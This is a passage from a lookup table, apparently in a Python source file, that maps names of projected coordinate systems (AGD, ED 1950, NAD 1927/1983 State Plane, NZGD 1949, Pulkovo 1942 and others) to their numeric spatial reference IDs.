'AGD_1966_AMG_Zone_56': 20256, 'AGD_1966_AMG_Zone_57': 20257, 'AGD_1966_AMG_Zone_58': 20258, 'AGD_1984_AMG_Zone_48': 20348, 'AGD_1984_AMG_Zone_49': 20349, 'AGD_1984_AMG_Zone_50': 20350, 'AGD_1984_AMG_Zone_51': 20351, 'AGD_1984_AMG_Zone_52': 20352, 'AGD_1984_AMG_Zone_53': 20353, 'AGD_1984_AMG_Zone_54': 20354, 'AGD_1984_AMG_Zone_55': 20355, 'AGD_1984_AMG_Zone_56': 20356, 'AGD_1984_AMG_Zone_57': 20357, 'AGD_1984_AMG_Zone_58': 20358, 'Ain_el_Abd_UTM_Zone_36N': 20436, 'Ain_el_Abd_UTM_Zone_37N': 20437, 'Ain_el_Abd_UTM_Zone_38N': 20438, 'Ain_el_Abd_UTM_Zone_39N': 20439, 'Ain_el_Abd_UTM_Zone_40N': 20440, 'Bahrain_State_Grid': 20499, 'Afgooye_UTM_Zone_38N': 20538, 'Afgooye_UTM_Zone_39N': 20539, 'Portuguese_National_Grid': 20790, 'Aratu_UTM_Zone_22S': 20822, 'Aratu_UTM_Zone_23S': 20823, 'Aratu_UTM_Zone_24S': 20824, 'Arc_1950_UTM_Zone_34S': 20934, 'Arc_1950_UTM_Zone_35S': 20935, 'Arc_1950_UTM_Zone_36S': 20936, 'Arc_1960_UTM_Zone_35S': 21035, 'Arc_1960_UTM_Zone_36S': 21036, 'Arc_1960_UTM_Zone_37S': 21037, 'Arc_1960_UTM_Zone_35N': 21095, 'Arc_1960_UTM_Zone_36N': 21096, 'Arc_1960_UTM_Zone_37N': 21097, 'Batavia_UTM_Zone_48S': 21148, 'Batavia_UTM_Zone_49S': 21149, 'Batavia_UTM_Zone_50S': 21150, 'Barbados_1938_British_West_Indies_Grid': 21291, 'Barbados_1938_Barbados_Grid': 21292, 'Beijing_1954_GK_Zone_13': 21413, 'Beijing_1954_GK_Zone_14': 21414, 'Beijing_1954_GK_Zone_15': 21415, 'Beijing_1954_GK_Zone_16': 21416, 'Beijing_1954_GK_Zone_17': 21417, 'Beijing_1954_GK_Zone_18': 21418, 'Beijing_1954_GK_Zone_19': 21419, 'Beijing_1954_GK_Zone_20': 21420, 'Beijing_1954_GK_Zone_21': 21421, 'Beijing_1954_GK_Zone_22': 21422, 'Beijing_1954_GK_Zone_23': 21423, 'Beijing_1954_GK_Zone_13N': 21473, 'Beijing_1954_GK_Zone_14N': 21474, 'Beijing_1954_GK_Zone_15N': 21475, 'Beijing_1954_GK_Zone_16N': 21476, 'Beijing_1954_GK_Zone_17N': 21477, 'Beijing_1954_GK_Zone_18N': 21478, 'Beijing_1954_GK_Zone_19N': 21479, 'Beijing_1954_GK_Zone_20N': 21480, 'Beijing_1954_GK_Zone_21N': 21481, 
'Beijing_1954_GK_Zone_22N': 21482, 'Beijing_1954_GK_Zone_23N': 21483, 'Belge_Lambert_1950': 21500, 'Bern_1898_Bern_LV03C': 21780, 'CH1903_LV03': 21781, 'Bogota_UTM_Zone_17N': 21817, 'Bogota_UTM_Zone_18N': 21818, 'Colombia_West_Zone': 21891, 'Colombia_Bogota_Zone': 21892, 'Colombia_East_Central_Zone': 21893, 'Colombia_East_Zone': 21894, 'Colombia_West_Zone': 21896, 'Colombia_Bogota_Zone': 21897, 'Colombia_East_Central_Zone': 21898, 'Colombia_East_Zone': 21899, 'Camacupa_UTM_Zone_32S': 22032, 'Camacupa_UTM_Zone_33S': 22033, 'Camacupa_TM_11_30_SE': 22091, 'Camacupa_TM_12_SE': 22092, 'POSGAR_1998_Argentina_Zone_1': 22171, 'POSGAR_1998_Argentina_Zone_2': 22172, 'POSGAR_1998_Argentina_Zone_3': 22173, 'POSGAR_1998_Argentina_Zone_4': 22174, 'POSGAR_1998_Argentina_Zone_5': 22175, 'POSGAR_1998_Argentina_Zone_6': 22176, 'POSGAR_1998_Argentina_Zone_7': 22177, 'POSGAR_1994_Argentina_Zone_1': 22181, 'POSGAR_1994_Argentina_Zone_2': 22182, 'POSGAR_1994_Argentina_Zone_3': 22183, 'POSGAR_1994_Argentina_Zone_4': 22184, 'POSGAR_1994_Argentina_Zone_5': 22185, 'POSGAR_1994_Argentina_Zone_6': 22186, 'POSGAR_1994_Argentina_Zone_7': 22187, 'Argentina_Zone_1': 22191, 'Argentina_Zone_2': 22192, 'Argentina_Zone_3': 22193, 'Argentina_Zone_4': 22194, 'Argentina_Zone_5': 22195, 'Argentina_Zone_6': 22196, 'Argentina_Zone_7': 22197, 'Cape_UTM_Zone_34S': 22234, 'Cape_UTM_Zone_35S': 22235, 'Cape_UTM_Zone_36S': 22236, 'Carthage_UTM_Zone_32N': 22332, 'Nord_Tunisie': 22391, 'Sud_Tunisie': 22392, 'Corrego_Alegre_UTM_Zone_21S': 22521, 'Corrego_Alegre_UTM_Zone_22S': 22522, 'Corrego_Alegre_UTM_Zone_23S': 22523, 'Corrego_Alegre_UTM_Zone_24S': 22524, 'Corrego_Alegre_UTM_Zone_25S': 22525, 'Deir_ez_Zor_Levant_Zone': 22700, 'Deir_ez_Zor_Syria_Lambert': 22770, 'Deir_ez_Zor_Levant_Stereographic': 22780, 'Douala_UTM_Zone_32N': 22832, 'Egypt_Blue_Belt': 22991, 'Egypt_Red_Belt': 22992, 'Egypt_Purple_Belt': 22993, 'Egypt_Extended_Purple_Belt': 22994, 'ED_1950_UTM_Zone_28N': 23028, 'ED_1950_UTM_Zone_29N': 23029, 
'ED_1950_UTM_Zone_30N': 23030, 'ED_1950_UTM_Zone_31N': 23031, 'ED_1950_UTM_Zone_32N': 23032, 'ED_1950_UTM_Zone_33N': 23033, 'ED_1950_UTM_Zone_34N': 23034, 'ED_1950_UTM_Zone_35N': 23035, 'ED_1950_UTM_Zone_36N': 23036, 'ED_1950_UTM_Zone_37N': 23037, 'ED_1950_UTM_Zone_38N': 23038, 'ED_1950_TM_0_N': 23090, 'ED_1950_TM_5_NE': 23095, 'Fahud_UTM_Zone_39N': 23239, 'Fahud_UTM_Zone_40N': 23240, 'Garoua_UTM_Zone_33N': 23433, 'Hungarian_1972_Egyseges_Orszagos_Vetuleti': 23700, 'DGN_1995_Indonesia_TM-3_Zone_46.2': 23830, 'DGN_1995_Indonesia_TM-3_Zone_47.1': 23831, 'DGN_1995_Indonesia_TM-3_Zone_47.2': 23832, 'DGN_1995_Indonesia_TM-3_Zone_48.1': 23833, 'DGN_1995_Indonesia_TM-3_Zone_48.2': 23834, 'DGN_1995_Indonesia_TM-3_Zone_49.1': 23835, 'DGN_1995_Indonesia_TM-3_Zone_49.2': 23836, 'DGN_1995_Indonesia_TM-3_Zone_50.1': 23837, 'DGN_1995_Indonesia_TM-3_Zone_50.2': 23838, 'DGN_1995_Indonesia_TM-3_Zone_51.1': 23839, 'DGN_1995_Indonesia_TM-3_Zone_51.2': 23840, 'DGN_1995_Indonesia_TM-3_Zone_52.1': 23841, 'DGN_1995_Indonesia_TM-3_Zone_52.2': 23842, 'DGN_1995_Indonesia_TM-3_Zone_53.1': 23843, 'DGN_1995_Indonesia_TM-3_Zone_53.2': 23844, 'DGN_1995_Indonesia_TM-3_Zone_54.1': 23845, 'Indonesian_1974_UTM_Zone_46N': 23846, 'Indonesian_1974_UTM_Zone_47N': 23847, 'Indonesian_1974_UTM_Zone_48N': 23848, 'Indonesian_1974_UTM_Zone_49N': 23849, 'Indonesian_1974_UTM_Zone_50N': 23850, 'Indonesian_1974_UTM_Zone_51N': 23851, 'Indonesian_1974_UTM_Zone_52N': 23852, 'Indonesian_1974_UTM_Zone_53N': 23853, 'DGN_1995_UTM_Zone_46N': 23866, 'DGN_1995_UTM_Zone_47N': 23867, 'DGN_1995_UTM_Zone_48N': 23868, 'DGN_1995_UTM_Zone_49N': 23869, 'DGN_1995_UTM_Zone_50N': 23870, 'DGN_1995_UTM_Zone_51N': 23871, 'DGN_1995_UTM_Zone_52N': 23872, 'DGN_1995_UTM_Zone_47S': 23877, 'DGN_1995_UTM_Zone_48S': 23878, 'DGN_1995_UTM_Zone_49S': 23879, 'DGN_1995_UTM_Zone_50S': 23880, 'DGN_1995_UTM_Zone_51S': 23881, 'DGN_1995_UTM_Zone_52S': 23882, 'DGN_1995_UTM_Zone_53S': 23883, 'DGN_1995_UTM_Zone_54S': 23884, 'Indonesian_1974_UTM_Zone_46S': 
23886, 'Indonesian_1974_UTM_Zone_47S': 23887, 'Indonesian_1974_UTM_Zone_48S': 23888, 'Indonesian_1974_UTM_Zone_49S': 23889, 'Indonesian_1974_UTM_Zone_50S': 23890, 'Indonesian_1974_UTM_Zone_51S': 23891, 'Indonesian_1974_UTM_Zone_52S': 23892, 'Indonesian_1974_UTM_Zone_53S': 23893, 'Indonesian_1974_UTM_Zone_54S': 23894, 'Indian_1954_UTM_Zone_46N': 23946, 'Indian_1954_UTM_Zone_47N': 23947, 'Indian_1954_UTM_Zone_48N': 23948, 'Indian_1975_UTM_Zone_47N': 24047, 'Indian_1975_UTM_Zone_48N': 24048, 'Jamaica_1875_Old_Grid': 24100, 'Jamaica_Grid': 24200, 'Kalianpur_1937_UTM_Zone_45N': 24305, 'Kalianpur_1937_UTM_Zone_46N': 24306, 'Kalianpur_1962_UTM_Zone_41N': 24311, 'Kalianpur_1962_UTM_Zone_42N': 24312, 'Kalianpur_1962_UTM_Zone_43N': 24313, 'Kalianpur_1975_UTM_Zone_42N': 24342, 'Kalianpur_1975_UTM_Zone_43N': 24343, 'Kalianpur_1975_UTM_Zone_44N': 24344, 'Kalianpur_1975_UTM_Zone_45N': 24345, 'Kalianpur_1975_UTM_Zone_46N': 24346, 'Kalianpur_1975_UTM_Zone_47N': 24347, 'Kalianpur_1880_India_Zone_0': 24370, 'Kalianpur_1880_India_Zone_I': 24371, 'Kalianpur_1880_India_Zone_IIa': 24372, 'Kalianpur_1880_India_Zone_III': 24373, 'Kalianpur_1880_India_Zone_IV': 24374, 'Kalianpur_1937_India_Zone_IIb': 24375, 'Kalianpur_1962_India_Zone_I': 24376, 'Kalianpur_1962_India_Zone_IIa': 24377, 'Kalianpur_1975_India_Zone_I': 24378, 'Kalianpur_1975_India_Zone_IIa': 24379, 'Kalianpur_1975_India_Zone_IIb': 24380, 'Kalianpur_1975_India_Zone_III': 24381, 'Kalianpur_1880_India_Zone_IIb': 24382, 'Kalianpur_1975_India_Zone_IV': 24383, 'Kertau_Singapore_Grid': 24500, 'Kertau_UTM_Zone_47N': 24547, 'Kertau_UTM_Zone_48N': 24548, 'Kertau_RSO_Malaya_Chains': 24571, 'KOC_Lambert': 24600, 'La_Canoa_UTM_Zone_18N': 24718, 'La_Canoa_UTM_Zone_19N': 24719, 'La_Canoa_UTM_Zone_20N': 24720, 'La_Canoa_UTM_Zone_21N': 24721, 'PSAD_1956_UTM_Zone_17N': 24817, 'PSAD_1956_UTM_Zone_18N': 24818, 'PSAD_1956_UTM_Zone_19N': 24819, 'PSAD_1956_UTM_Zone_20N': 24820, 'PSAD_1956_UTM_Zone_21N': 24821, 'PSAD_1956_UTM_Zone_17S': 24877, 
'PSAD_1956_UTM_Zone_18S': 24878, 'PSAD_1956_UTM_Zone_19S': 24879, 'PSAD_1956_UTM_Zone_20S': 24880, 'PSAD_1956_UTM_Zone_21S': 24881, 'PSAD_1956_UTM_Zone_22S': 24882, 'Peru_West_Zone': 24891, 'Peru_Central_Zone': 24892, 'Peru_East_Zone': 24893, 'Ghana_Metre_Grid': 25000, 'Lome_UTM_Zone_31N': 25231, 'Philippines_Zone_I': 25391, 'Philippines_Zone_II': 25392, 'Philippines_Zone_III': 25393, 'Philippines_Zone_IV': 25394, 'Philippines_Zone_V': 25395, 'ETRS_1989_UTM_Zone_28N': 25828, 'ETRS_1989_UTM_Zone_29N': 25829, 'ETRS_1989_UTM_Zone_30N': 25830, 'ETRS_1989_UTM_Zone_31N': 25831, 'ETRS_1989_UTM_Zone_32N': 25832, 'ETRS_1989_UTM_Zone_33N': 25833, 'ETRS_1989_UTM_Zone_34N': 25834, 'ETRS_1989_UTM_Zone_35N': 25835, 'ETRS_1989_UTM_Zone_36N': 25836, 'ETRS_1989_UTM_Zone_37N': 25837, 'ETRS_1989_UTM_Zone_38N': 25838, 'ETRS_1989_TM_Baltic_1993': 25884, 'Malongo_1987_UTM_Zone_32S': 25932, 'Nord_Maroc': 26191, 'Sud_Maroc': 26192, 'Sahara': 26193, 'Merchich_Sahara_Nord': 26194, 'Merchich_Sahara_Sud': 26195, 'Massawa_UTM_Zone_37N': 26237, 'Minna_UTM_Zone_31N': 26331, 'Minna_UTM_Zone_32N': 26332, 'Nigeria_West_Belt': 26391, 'Nigeria_Mid_Belt': 26392, 'Nigeria_East_Belt': 26393, 'Mhast_UTM_Zone_32S': 26432, 'Monte_Mario_Rome_Italy_1': 26591, 'Monte_Mario_Rome_Italy_2': 26592, 'Mporaloko_UTM_Zone_32N': 26632, 'Mporaloko_UTM_Zone_32S': 26692, 'NAD_1927_UTM_Zone_1N': 26701, 'NAD_1927_UTM_Zone_2N': 26702, 'NAD_1927_UTM_Zone_3N': 26703, 'NAD_1927_UTM_Zone_4N': 26704, 'NAD_1927_UTM_Zone_5N': 26705, 'NAD_1927_UTM_Zone_6N': 26706, 'NAD_1927_UTM_Zone_7N': 26707, 'NAD_1927_UTM_Zone_8N': 26708, 'NAD_1927_UTM_Zone_9N': 26709, 'NAD_1927_UTM_Zone_10N': 26710, 'NAD_1927_UTM_Zone_11N': 26711, 'NAD_1927_UTM_Zone_12N': 26712, 'NAD_1927_UTM_Zone_13N': 26713, 'NAD_1927_UTM_Zone_14N': 26714, 'NAD_1927_UTM_Zone_15N': 26715, 'NAD_1927_UTM_Zone_16N': 26716, 'NAD_1927_UTM_Zone_17N': 26717, 'NAD_1927_UTM_Zone_18N': 26718, 'NAD_1927_UTM_Zone_19N': 26719, 'NAD_1927_UTM_Zone_20N': 26720, 'NAD_1927_UTM_Zone_21N': 26721, 
'NAD_1927_UTM_Zone_22N': 26722, 'NAD_1927_StatePlane_Alabama_East_FIPS_0101': 26729, 'NAD_1927_StatePlane_Alabama_West_FIPS_0102': 26730, 'NAD_1927_StatePlane_Alaska_1_FIPS_5001': 26731, 'NAD_1927_StatePlane_Alaska_2_FIPS_5002': 26732, 'NAD_1927_StatePlane_Alaska_3_FIPS_5003': 26733, 'NAD_1927_StatePlane_Alaska_4_FIPS_5004': 26734, 'NAD_1927_StatePlane_Alaska_5_FIPS_5005': 26735, 'NAD_1927_StatePlane_Alaska_6_FIPS_5006': 26736, 'NAD_1927_StatePlane_Alaska_7_FIPS_5007': 26737, 'NAD_1927_StatePlane_Alaska_8_FIPS_5008': 26738, 'NAD_1927_StatePlane_Alaska_9_FIPS_5009': 26739, 'NAD_1927_StatePlane_Alaska_10_FIPS_5010': 26740, 'NAD_1927_StatePlane_California_I_FIPS_0401': 26741, 'NAD_1927_StatePlane_California_II_FIPS_0402': 26742, 'NAD_1927_StatePlane_California_III_FIPS_0403': 26743, 'NAD_1927_StatePlane_California_IV_FIPS_0404': 26744, 'NAD_1927_StatePlane_California_V_FIPS_0405': 26745, 'NAD_1927_StatePlane_California_VI_FIPS_0406': 26746, 'NAD_1927_StatePlane_California_VII_FIPS_0407': 26747, 'NAD_1927_StatePlane_Arizona_East_FIPS_0201': 26748, 'NAD_1927_StatePlane_Arizona_Central_FIPS_0202': 26749, 'NAD_1927_StatePlane_Arizona_West_FIPS_0203': 26750, 'NAD_1927_StatePlane_Arkansas_North_FIPS_0301': 26751, 'NAD_1927_StatePlane_Arkansas_South_FIPS_0302': 26752, 'NAD_1927_StatePlane_Colorado_North_FIPS_0501': 26753, 'NAD_1927_StatePlane_Colorado_Central_FIPS_0502': 26754, 'NAD_1927_StatePlane_Colorado_South_FIPS_0503': 26755, 'NAD_1927_StatePlane_Connecticut_FIPS_0600': 26756, 'NAD_1927_StatePlane_Delaware_FIPS_0700': 26757, 'NAD_1927_StatePlane_Florida_East_FIPS_0901': 26758, 'NAD_1927_StatePlane_Florida_West_FIPS_0902': 26759, 'NAD_1927_StatePlane_Florida_North_FIPS_0903': 26760, 'NAD_1927_StatePlane_Hawaii_1_FIPS_5101': 26761, 'NAD_1927_StatePlane_Hawaii_2_FIPS_5102': 26762, 'NAD_1927_StatePlane_Hawaii_3_FIPS_5103': 26763, 'NAD_1927_StatePlane_Hawaii_4_FIPS_5104': 26764, 'NAD_1927_StatePlane_Hawaii_5_FIPS_5105': 26765, 'NAD_1927_StatePlane_Georgia_East_FIPS_1001': 
26766, 'NAD_1927_StatePlane_Georgia_West_FIPS_1002': 26767, 'NAD_1927_StatePlane_Idaho_East_FIPS_1101': 26768, 'NAD_1927_StatePlane_Idaho_Central_FIPS_1102': 26769, 'NAD_1927_StatePlane_Idaho_West_FIPS_1103': 26770, 'NAD_1927_StatePlane_Illinois_East_FIPS_1201': 26771, 'NAD_1927_StatePlane_Illinois_West_FIPS_1202': 26772, 'NAD_1927_StatePlane_Indiana_East_FIPS_1301': 26773, 'NAD_1927_StatePlane_Indiana_West_FIPS_1302': 26774, 'NAD_1927_StatePlane_Iowa_North_FIPS_1401': 26775, 'NAD_1927_StatePlane_Iowa_South_FIPS_1402': 26776, 'NAD_1927_StatePlane_Kansas_North_FIPS_1501': 26777, 'NAD_1927_StatePlane_Kansas_South_FIPS_1502': 26778, 'NAD_1927_StatePlane_Kentucky_North_FIPS_1601': 26779, 'NAD_1927_StatePlane_Kentucky_South_FIPS_1602': 26780, 'NAD_1927_StatePlane_Louisiana_North_FIPS_1701': 26781, 'NAD_1927_StatePlane_Louisiana_South_FIPS_1702': 26782, 'NAD_1927_StatePlane_Maine_East_FIPS_1801': 26783, 'NAD_1927_StatePlane_Maine_West_FIPS_1802': 26784, 'NAD_1927_StatePlane_Maryland_FIPS_1900': 26785, 'NAD_1927_StatePlane_Massachusetts_Mainland_FIPS_2001': 26786, 'NAD_1927_StatePlane_Massachusetts_Island_FIPS_2002': 26787, 'NAD_1927_StatePlane_Michigan_North_FIPS_2111': 26788, 'NAD_1927_StatePlane_Michigan_Central_FIPS_2112': 26789, 'NAD_1927_StatePlane_Michigan_South_FIPS_2113': 26790, 'NAD_1927_StatePlane_Minnesota_North_FIPS_2201': 26791, 'NAD_1927_StatePlane_Minnesota_Central_FIPS_2202': 26792, 'NAD_1927_StatePlane_Minnesota_South_FIPS_2203': 26793, 'NAD_1927_StatePlane_Mississippi_East_FIPS_2301': 26794, 'NAD_1927_StatePlane_Mississippi_West_FIPS_2302': 26795, 'NAD_1927_StatePlane_Missouri_East_FIPS_2401': 26796, 'NAD_1927_StatePlane_Missouri_Central_FIPS_2402': 26797, 'NAD_1927_StatePlane_Missouri_West_FIPS_2403': 26798, 'NAD_1927_StatePlane_California_VII_FIPS_0407': 26799, 'NAD_Michigan_StatePlane_Michigan_East_Old_FIPS_2101': 26801, 'NAD_Michigan_StatePlane_Michigan_Central_Old_FIPS_2102': 26802, 'NAD_Michigan_StatePlane_Michigan_West_Old_FIPS_2103': 26803, 
'NAD_Michigan_StatePlane_Michigan_North_FIPS_2111': 26811, 'NAD_Michigan_StatePlane_Michigan_Central_FIPS_2112': 26812, 'NAD_Michigan_StatePlane_Michigan_South_FIPS_2113': 26813, 'NAD_1983_UTM_Zone_1N': 26901, 'NAD_1983_UTM_Zone_2N': 26902, 'NAD_1983_UTM_Zone_3N': 26903, 'NAD_1983_UTM_Zone_4N': 26904, 'NAD_1983_UTM_Zone_5N': 26905, 'NAD_1983_UTM_Zone_6N': 26906, 'NAD_1983_UTM_Zone_7N': 26907, 'NAD_1983_UTM_Zone_8N': 26908, 'NAD_1983_UTM_Zone_9N': 26909, 'NAD_1983_UTM_Zone_10N': 26910, 'NAD_1983_UTM_Zone_11N': 26911, 'NAD_1983_UTM_Zone_12N': 26912, 'NAD_1983_UTM_Zone_13N': 26913, 'NAD_1983_UTM_Zone_14N': 26914, 'NAD_1983_UTM_Zone_15N': 26915, 'NAD_1983_UTM_Zone_16N': 26916, 'NAD_1983_UTM_Zone_17N': 26917, 'NAD_1983_UTM_Zone_18N': 26918, 'NAD_1983_UTM_Zone_19N': 26919, 'NAD_1983_UTM_Zone_20N': 26920, 'NAD_1983_UTM_Zone_21N': 26921, 'NAD_1983_UTM_Zone_22N': 26922, 'NAD_1983_UTM_Zone_23N': 26923, 'NAD_1983_StatePlane_Alabama_East_FIPS_0101': 26929, 'NAD_1983_StatePlane_Alabama_West_FIPS_0102': 26930, 'NAD_1983_StatePlane_Alaska_1_FIPS_5001': 26931, 'NAD_1983_StatePlane_Alaska_2_FIPS_5002': 26932, 'NAD_1983_StatePlane_Alaska_3_FIPS_5003': 26933, 'NAD_1983_StatePlane_Alaska_4_FIPS_5004': 26934, 'NAD_1983_StatePlane_Alaska_5_FIPS_5005': 26935, 'NAD_1983_StatePlane_Alaska_6_FIPS_5006': 26936, 'NAD_1983_StatePlane_Alaska_7_FIPS_5007': 26937, 'NAD_1983_StatePlane_Alaska_8_FIPS_5008': 26938, 'NAD_1983_StatePlane_Alaska_9_FIPS_5009': 26939, 'NAD_1983_StatePlane_Alaska_10_FIPS_5010': 26940, 'NAD_1983_StatePlane_California_I_FIPS_0401': 26941, 'NAD_1983_StatePlane_California_II_FIPS_0402': 26942, 'NAD_1983_StatePlane_California_III_FIPS_0403': 26943, 'NAD_1983_StatePlane_California_IV_FIPS_0404': 26944, 'NAD_1983_StatePlane_California_V_FIPS_0405': 26945, 'NAD_1983_StatePlane_California_VI_FIPS_0406': 26946, 'NAD_1983_StatePlane_Arizona_East_FIPS_0201': 26948, 'NAD_1983_StatePlane_Arizona_Central_FIPS_0202': 26949, 'NAD_1983_StatePlane_Arizona_West_FIPS_0203': 26950, 
'NAD_1983_StatePlane_Arkansas_North_FIPS_0301': 26951, 'NAD_1983_StatePlane_Arkansas_South_FIPS_0302': 26952, 'NAD_1983_StatePlane_Colorado_North_FIPS_0501': 26953, 'NAD_1983_StatePlane_Colorado_Central_FIPS_0502': 26954, 'NAD_1983_StatePlane_Colorado_South_FIPS_0503': 26955, 'NAD_1983_StatePlane_Connecticut_FIPS_0600': 26956, 'NAD_1983_StatePlane_Delaware_FIPS_0700': 26957, 'NAD_1983_StatePlane_Florida_East_FIPS_0901': 26958, 'NAD_1983_StatePlane_Florida_West_FIPS_0902': 26959, 'NAD_1983_StatePlane_Florida_North_FIPS_0903': 26960, 'NAD_1983_StatePlane_Hawaii_1_FIPS_5101': 26961, 'NAD_1983_StatePlane_Hawaii_2_FIPS_5102': 26962, 'NAD_1983_StatePlane_Hawaii_3_FIPS_5103': 26963, 'NAD_1983_StatePlane_Hawaii_4_FIPS_5104': 26964, 'NAD_1983_StatePlane_Hawaii_5_FIPS_5105': 26965, 'NAD_1983_StatePlane_Georgia_East_FIPS_1001': 26966, 'NAD_1983_StatePlane_Georgia_West_FIPS_1002': 26967, 'NAD_1983_StatePlane_Idaho_East_FIPS_1101': 26968, 'NAD_1983_StatePlane_Idaho_Central_FIPS_1102': 26969, 'NAD_1983_StatePlane_Idaho_West_FIPS_1103': 26970, 'NAD_1983_StatePlane_Illinois_East_FIPS_1201': 26971, 'NAD_1983_StatePlane_Illinois_West_FIPS_1202': 26972, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301': 26973, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302': 26974, 'NAD_1983_StatePlane_Iowa_North_FIPS_1401': 26975, 'NAD_1983_StatePlane_Iowa_South_FIPS_1402': 26976, 'NAD_1983_StatePlane_Kansas_North_FIPS_1501': 26977, 'NAD_1983_StatePlane_Kansas_South_FIPS_1502': 26978, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601': 26979, 'NAD_1983_StatePlane_Kentucky_South_FIPS_1602': 26980, 'NAD_1983_StatePlane_Louisiana_North_FIPS_1701': 26981, 'NAD_1983_StatePlane_Louisiana_South_FIPS_1702': 26982, 'NAD_1983_StatePlane_Maine_East_FIPS_1801': 26983, 'NAD_1983_StatePlane_Maine_West_FIPS_1802': 26984, 'NAD_1983_StatePlane_Maryland_FIPS_1900': 26985, 'NAD_1983_StatePlane_Massachusetts_Mainland_FIPS_2001': 26986, 'NAD_1983_StatePlane_Massachusetts_Island_FIPS_2002': 26987, 
'NAD_1983_StatePlane_Michigan_North_FIPS_2111': 26988, 'NAD_1983_StatePlane_Michigan_Central_FIPS_2112': 26989, 'NAD_1983_StatePlane_Michigan_South_FIPS_2113': 26990, 'NAD_1983_StatePlane_Minnesota_North_FIPS_2201': 26991, 'NAD_1983_StatePlane_Minnesota_Central_FIPS_2202': 26992, 'NAD_1983_StatePlane_Minnesota_South_FIPS_2203': 26993, 'NAD_1983_StatePlane_Mississippi_East_FIPS_2301': 26994, 'NAD_1983_StatePlane_Mississippi_West_FIPS_2302': 26995, 'NAD_1983_StatePlane_Missouri_East_FIPS_2401': 26996, 'NAD_1983_StatePlane_Missouri_Central_FIPS_2402': 26997, 'NAD_1983_StatePlane_Missouri_West_FIPS_2403': 26998, 'Nahrwan_1967_UTM_Zone_37N': 27037, 'Nahrwan_1967_UTM_Zone_38N': 27038, 'Nahrwan_1967_UTM_Zone_39N': 27039, 'Nahrwan_1967_UTM_Zone_40N': 27040, 'Naparima_1972_UTM_Zone_20N': 27120, 'GD_1949_New_Zealand_Map_Grid': 27200, 'NZGD_1949_Mount_Eden_Circuit': 27205, 'NZGD_1949_Bay_of_Plenty_Circuit': 27206, 'NZGD_1949_Poverty_Bay_Circuit': 27207, 'NZGD_1949_Hawkes_Bay_Circuit': 27208, 'NZGD_1949_Taranaki_Circuit': 27209, 'NZGD_1949_Tuhirangi_Circuit': 27210, 'NZGD_1949_Wanganui_Circuit': 27211, 'NZGD_1949_Wairarapa_Circuit': 27212, 'NZGD_1949_Wellington_Circuit': 27213, 'NZGD_1949_Collingwood_Circuit': 27214, 'NZGD_1949_Nelson_Circuit': 27215, 'NZGD_1949_Karamea_Circuit': 27216, 'NZGD_1949_Buller_Circuit': 27217, 'NZGD_1949_Grey_Circuit': 27218, 'NZGD_1949_Amuri_Circuit': 27219, 'NZGD_1949_Marlborough_Circuit': 27220, 'NZGD_1949_Hokitika_Circuit': 27221, 'NZGD_1949_Okarito_Circuit': 27222, 'NZGD_1949_Jacksons_Bay_Circuit': 27223, 'NZGD_1949_Mount_Pleasant_Circuit': 27224, 'NZGD_1949_Gawler_Circuit': 27225, 'NZGD_1949_Timaru_Circuit': 27226, 'NZGD_1949_Lindis_Peak_Circuit': 27227, 'NZGD_1949_Mount_Nicholas_Circuit': 27228, 'NZGD_1949_Mount_York_Circuit': 27229, 'NZGD_1949_Observation_Point_Circuit': 27230, 'NZGD_1949_North_Taieri_Circuit': 27231, 'NZGD_1949_Bluff_Circuit': 27232, 'NZGD_1949_UTM_Zone_58S': 27258, 'NZGD_1949_UTM_Zone_59S': 27259, 'NZGD_1949_UTM_Zone_60S': 
27260, 'New_Zealand_North_Island': 27291, 'New_Zealand_South_Island': 27292, 'NGO_1948_Oslo_Norway_Zone_1': 27391, 'NGO_1948_Oslo_Norway_Zone_2': 27392, 'NGO_1948_Oslo_Norway_Zone_3': 27393, 'NGO_1948_Oslo_Norway_Zone_4': 27394, 'NGO_1948_Oslo_Norway_Zone_5': 27395, 'NGO_1948_Oslo_Norway_Zone_6': 27396, 'NGO_1948_Oslo_Norway_Zone_7': 27397, 'NGO_1948_Oslo_Norway_Zone_8': 27398, 'Datum_73_UTM_Zone_29N': 27429, 'Datum_73_Modified_Portuguese_Grid': 27492, 'Nord_de_Guerre': 27500, 'NTF_Paris_Lambert_Nord_France': 27561, 'NTF_Paris_Lambert_Centre_France': 27562, 'NTF_Paris_Lambert_Sud_France': 27563, 'NTF_Paris_Lambert_Corse': 27564, 'NTF_Paris_Lambert_Zone_I': 27571, 'NTF_Paris_Lambert_Zone_II': 27572, 'NTF_Paris_Lambert_Zone_III': 27573, 'NTF_Paris_Lambert_Zone_IV': 27574, 'NTF_Paris_France_I': 27581, 'NTF_Paris_France_II': 27582, 'NTF_Paris_France_III': 27583, 'NTF_Paris_France_IV': 27584, 'NTF_Paris_Nord_France': 27591, 'NTF_Paris_Centre_France': 27592, 'NTF_Paris_Sud_France': 27593, 'NTF_Paris_Corse': 27594, 'British_National_Grid': 27700, 'Palestine_1923_Palestine_Grid': 28191, 'Palestine_1923_Palestine_Belt': 28192, 'Palestine_1923_Israel_CS_Grid': 28193, 'Pointe_Noire_UTM_Zone_32S': 28232, 'GDA_1994_MGA_Zone_48': 28348, 'GDA_1994_MGA_Zone_49': 28349, 'GDA_1994_MGA_Zone_50': 28350, 'GDA_1994_MGA_Zone_51': 28351, 'GDA_1994_MGA_Zone_52': 28352, 'GDA_1994_MGA_Zone_53': 28353, 'GDA_1994_MGA_Zone_54': 28354, 'GDA_1994_MGA_Zone_55': 28355, 'GDA_1994_MGA_Zone_56': 28356, 'GDA_1994_MGA_Zone_57': 28357, 'GDA_1994_MGA_Zone_58': 28358, 'Pulkovo_1942_GK_Zone_2': 28402, 'Pulkovo_1942_GK_Zone_3': 28403, 'Pulkovo_1942_GK_Zone_4': 28404, 'Pulkovo_1942_GK_Zone_5': 28405, 'Pulkovo_1942_GK_Zone_6': 28406, 'Pulkovo_1942_GK_Zone_7': 28407, 'Pulkovo_1942_GK_Zone_8': 28408, 'Pulkovo_1942_GK_Zone_9': 28409, 'Pulkovo_1942_GK_Zone_10': 28410, 'Pulkovo_1942_GK_Zone_11': 28411, 'Pulkovo_1942_GK_Zone_12': 28412, 'Pulkovo_1942_GK_Zone_13': 28413, 'Pulkovo_1942_GK_Zone_14': 28414, 
